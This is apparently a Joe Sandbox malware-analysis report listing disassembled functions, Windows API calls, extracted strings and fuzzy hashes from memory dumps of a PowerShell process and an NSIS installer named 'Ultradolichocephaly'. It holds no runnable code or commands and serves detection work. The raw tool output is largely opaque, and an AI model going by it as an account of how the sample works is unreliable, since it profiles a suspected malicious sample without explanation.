                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 84xl$84xl$84xl$84xl$tPsq$tPsq$tPsq$tPsq
                                                          • API String ID: 0-274998026
                                                          • Opcode ID: c3cb580c7bfd4c4376a6efb0ebc5808f4bde355469c260e001c18e39f7c136f1
                                                          • Instruction ID: f23dcbd316c9c4199f65e9c449b0211c5ef588eaec012adb7db1ae0aa8be5234
                                                          • Opcode Fuzzy Hash: c3cb580c7bfd4c4376a6efb0ebc5808f4bde355469c260e001c18e39f7c136f1
                                                          • Instruction Fuzzy Hash: B8D1F9F1B042459FC724AB6CC955AABBBA2AFC5314F14C46BE9059F381DB31DC42CBA1
                                                          Function 0741A604 Relevance: 10.2, Strings: 8, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$84xl$TQxq$TQxq$tPsq$$sq$$sq$$sq
                                                          • API String ID: 0-3390573635
                                                          • Opcode ID: e53ba49a4657fe698c33e1a1e60154b970bc889c801a7fc8e61c6e88bfb8955f
                                                          • Instruction ID: 8d1f2def70e0e46fb304a3076a208e50045d55d8ccd73cd499d188fb82261367
                                                          • Opcode Fuzzy Hash: e53ba49a4657fe698c33e1a1e60154b970bc889c801a7fc8e61c6e88bfb8955f
                                                          • Instruction Fuzzy Hash: 2051DCF0706206DFDB25EE14C6447E6B7B2BB41321F18C86BE8158B691C735DD82CBA1
                                                          Function 0741B020 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$84xl$tPsq$$sq$$sq$$sq
                                                          • API String ID: 0-836809895
                                                          • Opcode ID: e1329241e1e3a2a37bcb1e1eb1e44832422ee3c8593dbe6df98dbe8d9f18e22f
                                                          • Instruction ID: 1c39d18df5b054b3c9fa7b5535b993a558b092e084d8cf9ca6abf0bff270a27d
                                                          • Opcode Fuzzy Hash: e1329241e1e3a2a37bcb1e1eb1e44832422ee3c8593dbe6df98dbe8d9f18e22f
                                                          • Instruction Fuzzy Hash: 7C61FFF0A0020ADBDB24AE14C944BEBB7A2FF45351F1A84A7E8145B391C731DD95CBA1
                                                          Function 074173E0 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $sq$$sq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-3087168343
                                                          • Opcode ID: a3b5cb2e9ccafc6785a9436c416b6006ce4f51a8effad537ffcd1c7fcd3674ca
                                                          • Instruction ID: 756c3eee1d44919c37e2ab02d592e27732bdddcba4529edf53194a58c9426294
                                                          • Opcode Fuzzy Hash: a3b5cb2e9ccafc6785a9436c416b6006ce4f51a8effad537ffcd1c7fcd3674ca
                                                          • Instruction Fuzzy Hash: 59315AB6B882478BCB372AB9A8501F7FFA2ABC1211B24447BC54287342DE35C846D352
                                                          Function 07410470 Relevance: 6.4, Strings: 5, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$$sq$$sq$$sq
                                                          • API String ID: 0-737313894
                                                          • Opcode ID: dc8eacba23bd53595dbc721d3c7d8b968f4ce9afdeaaf2ec71198fdd08e9c704
                                                          • Instruction ID: 4a4af0ce8be77529728c42358c092e05c9867d8ec965d9e6b5937edffa7eb36b
                                                          • Opcode Fuzzy Hash: dc8eacba23bd53595dbc721d3c7d8b968f4ce9afdeaaf2ec71198fdd08e9c704
                                                          • Instruction Fuzzy Hash: 394126B1B042069FCB15AA7895206FB7BA29FC2210F5544BBD505CB3A1DF36C982C7A1
                                                          Function 0741B3E8 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 84xl$XRxq$XRxq$tPsq$$sq
                                                          • API String ID: 0-1049711044
                                                          • Opcode ID: f10bb429a71272fb83607a786e6756499d8631195829ae961cb3048219f26df3
                                                          • Instruction ID: 1517a3b72949e0d909b45db29a09e2c0d060005bb25e40464b0ef30a876ca19b
                                                          • Opcode Fuzzy Hash: f10bb429a71272fb83607a786e6756499d8631195829ae961cb3048219f26df3
                                                          • Instruction Fuzzy Hash: 15416DF0A04205DBCB24EF59C154AEAF7F2EB89324F5AC4AAE415AB351C731DD41CB91
                                                          Function 0741F8A8 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $sq$$sq$$sq$pl$pl
                                                          • API String ID: 0-108492800
                                                          • Opcode ID: c6b9cb603b631336ba7eef6c6fda7318cbe8170422ad776173b85fcd609e911c
                                                          • Instruction ID: ea4a336122e5eea788765e14726ccc539bf138f667c08b4c34002d4b4e769a57
                                                          • Opcode Fuzzy Hash: c6b9cb603b631336ba7eef6c6fda7318cbe8170422ad776173b85fcd609e911c
                                                          • Instruction Fuzzy Hash: 241129B1715206ABDB24756A98007A7F7A6BBC2324F24842BE44987391CB31C84BC350
                                                          Function 07419B00 Relevance: 5.5, Strings: 4, Instructions: 484COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (osq$(osq$(osq$(osq
                                                          • API String ID: 0-1093687733
                                                          • Opcode ID: 4f48619aa1a2819efba31c2988b8dea14ab5b8d36cff81e63eca4c1554603d9c
                                                          • Instruction ID: 62e4d82fca442f2c198ee015ec7bceab550ca764f6012a98fe9aad5e21177ca0
                                                          • Opcode Fuzzy Hash: 4f48619aa1a2819efba31c2988b8dea14ab5b8d36cff81e63eca4c1554603d9c
                                                          • Instruction Fuzzy Hash: 19F119B1708386DFCB15AF68C8647EBBBA2AF81311F14C46BE5558B391DB32E841CB51
                                                          Function 0741EAF8 Relevance: 5.5, Strings: 4, Instructions: 481COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$4'sq$4'sq
                                                          • API String ID: 0-1617174353
                                                          • Opcode ID: 775530e04f1777aa7226552a90bf95210438b4231e06f5df2e9590f66b316261
                                                          • Instruction ID: 10a409e30a3c266838835b86698ec098a99522ee129be82450e0ada28873f82b
                                                          • Opcode Fuzzy Hash: 775530e04f1777aa7226552a90bf95210438b4231e06f5df2e9590f66b316261
                                                          • Instruction Fuzzy Hash: 0AE14DF6B082569FCB25AB7889017A7BBA29FC2315F18847BD905CB351DF32D842C791
                                                          Function 07417D46 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$x.kk$-kk
                                                          • API String ID: 0-2206710387
                                                          • Opcode ID: d522653b70156c5ee613da01400ea3e1a982f77bbcdce2a218c6166fe103fd88
                                                          • Instruction ID: 05845b356dab307b5103a4cf848a9d1376c179a9fa3acef212710e42d18bf487
                                                          • Opcode Fuzzy Hash: d522653b70156c5ee613da01400ea3e1a982f77bbcdce2a218c6166fe103fd88
                                                          • Instruction Fuzzy Hash: 62F15CB0A00219DFCB54DB58C945BDABBB2BF88304F1085D5E9096F785CB72AD86CF91
                                                          Function 07412E28 Relevance: 5.3, Strings: 4, Instructions: 283COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 84xl$84xl$tPsq$tPsq
                                                          • API String ID: 0-2601135372
                                                          • Opcode ID: abc06201ad0597d2704de5f224a233218f3d229e70150507807d848ddce6eaf9
                                                          • Instruction ID: e67b88dbf78abd5e1e7ac4e283a4008260a72f405517972f1c81df50a7e4ad2b
                                                          • Opcode Fuzzy Hash: abc06201ad0597d2704de5f224a233218f3d229e70150507807d848ddce6eaf9
                                                          • Instruction Fuzzy Hash: 3C9138B17042469BCB28AE79C8516ABBFE6AFC5310F18846BD945DB392CF31D841C7A1
                                                          Function 07414BE0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$(fzl$(fzl
                                                          • API String ID: 0-3225199445
                                                          • Opcode ID: d55cdde3d753385e7d87383f6fd39045f648e7fea4da9aa06c4c3f0fcff83005
                                                          • Instruction ID: 32e42e6dc5f27bacf3fe83d5bcfb88798ff1e210724f66ec020a9e52f8213d8e
                                                          • Opcode Fuzzy Hash: d55cdde3d753385e7d87383f6fd39045f648e7fea4da9aa06c4c3f0fcff83005
                                                          • Instruction Fuzzy Hash: 57719DF0E00245DBCB14DFACC541AAABBB2AF89314F15C16AD804AF751DB32DC82CB91
                                                          Function 0741FC38 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $sq$$sq$$sq$$sq
                                                          • API String ID: 0-2855845837
                                                          • Opcode ID: cfb6b4e2735ec27bf619fe59c374bfe8834041794311e38a2a5c9e0aedaa49c0
                                                          • Instruction ID: 65a9b0612b1deab932c16e1eabad800af8859925adfe05c848b310b3a6a457e3
                                                          • Opcode Fuzzy Hash: cfb6b4e2735ec27bf619fe59c374bfe8834041794311e38a2a5c9e0aedaa49c0
                                                          • Instruction Fuzzy Hash: E52149F27152425BDB34657E69007B3B69AABC0710F24883BAD09CB382EF35D84BD361
                                                          Function 07410309 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$$sq$$sq
                                                          • API String ID: 0-148891389
                                                          • Opcode ID: a9f6502fcff3fbddde7b2dfd6734b8c167f0661dd9a5a72c185d0164a07b6436
                                                          • Instruction ID: cc9c014aece1b486a41d1178555bd8ac5ab402af2b88301515d10408b61d0c51
                                                          • Opcode Fuzzy Hash: a9f6502fcff3fbddde7b2dfd6734b8c167f0661dd9a5a72c185d0164a07b6436
                                                          • Instruction Fuzzy Hash: 7E0126B270C38A4FC72B23A858201567B726FC2600B6A41E3C181CF3A3CE258C878797

                                                          Non-executed Functions

                                                          Function 0040310F Relevance: 77.4, APIs: 33, Strings: 11, Instructions: 357stringcomfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32 ref: 00403134
                                                          • GetVersion.KERNEL32 ref: 0040313A
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                          • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                          • OleInitialize.OLE32(00000000), ref: 0040318C
                                                          • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                          • GetCommandLineA.KERNEL32(0042DC00,NSIS Error), ref: 004031BD
                                                          • GetModuleHandleA.KERNEL32(00000000,00434000,00000000), ref: 004031D0
                                                          • CharNextA.USER32(00000000,00434000,00000020), ref: 004031FB
                                                          • GetTempPathA.KERNEL32(00000400,00435400,00000000,00000020), ref: 004032F8
                                                          • GetWindowsDirectoryA.KERNEL32(00435400,000003FB), ref: 00403309
                                                          • lstrcatA.KERNEL32(00435400,\Temp), ref: 00403315
                                                          • GetTempPathA.KERNEL32(000003FC,00435400,00435400,\Temp), ref: 00403329
                                                          • lstrcatA.KERNEL32(00435400,Low), ref: 00403331
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,00435400,00435400,Low), ref: 00403342
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,00435400), ref: 0040334A
                                                          • DeleteFileA.KERNEL32(00435000), ref: 0040335E
                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • OleUninitialize.OLE32(?), ref: 0040340C
                                                          • ExitProcess.KERNEL32 ref: 0040342D
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                          • ExitProcess.KERNEL32 ref: 004035CF
                                                            • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                          • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3329125770-3048946811
                                                          • Opcode ID: 18141ac9e7fcba5b90f8b0ac50ebfc9b4084288e615748eb8764b98dad7c2969
                                                          • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                          • Opcode Fuzzy Hash: 18141ac9e7fcba5b90f8b0ac50ebfc9b4084288e615748eb8764b98dad7c2969
                                                          • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                          Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                          • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                          • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                          • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                          • DeleteObject.GDI32(00000000), ref: 004049BB
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                          • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                          • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                          • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                          • ShowWindow.USER32(00000000), ref: 00404EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: a3d3ad99b0f8efa623893e6a1d4f65310e000fa748ae66744d23e893eb9c45fa
                                                          • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                          • Opcode Fuzzy Hash: a3d3ad99b0f8efa623893e6a1d4f65310e000fa748ae66744d23e893eb9c45fa
                                                          • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                          Function 004055D1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,75923410,00435400,00000000), ref: 004055FA
                                                          • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,75923410,00435400,00000000), ref: 00405642
                                                          • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,75923410,00435400,00000000), ref: 00405663
                                                          • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,75923410,00435400,00000000), ref: 00405669
                                                          • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,75923410,00435400,00000000), ref: 0040567A
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                          • FindClose.KERNEL32(00000000), ref: 00405738
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          • Opcode ID: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                          • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                          • Opcode Fuzzy Hash: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                          • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                          Function 00405086 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                          • GetClientRect.USER32(?,?), ref: 00405131
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                          • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                            • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                          • ShowWindow.USER32(00000000), ref: 0040527E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405285
                                                          • ShowWindow.USER32(00000008), ref: 004052CB
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                          • CreatePopupMenu.USER32 ref: 00405310
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                          • OpenClipboard.USER32(00000000), ref: 004053AA
                                                          • EmptyClipboard.USER32 ref: 004053B0
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                          • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                          • CloseClipboard.USER32 ref: 00405401
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 311fc79b2a61d49d532f234ec6369dceb9bfd60424ce1a676fe4c78957951ccc
                                                          • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                          • Opcode Fuzzy Hash: 311fc79b2a61d49d532f234ec6369dceb9bfd60424ce1a676fe4c78957951ccc
                                                          • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                          Function 00403A41 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                          • ShowWindow.USER32(?), ref: 00403A9A
                                                          • DestroyWindow.USER32 ref: 00403AAE
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                          • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                          • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                          • EnableWindow.USER32(?,?), ref: 00403D02
                                                          • EnableWindow.USER32(?,?), ref: 00403D1D
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                          • EnableMenuItem.USER32(00000000), ref: 00403D3A
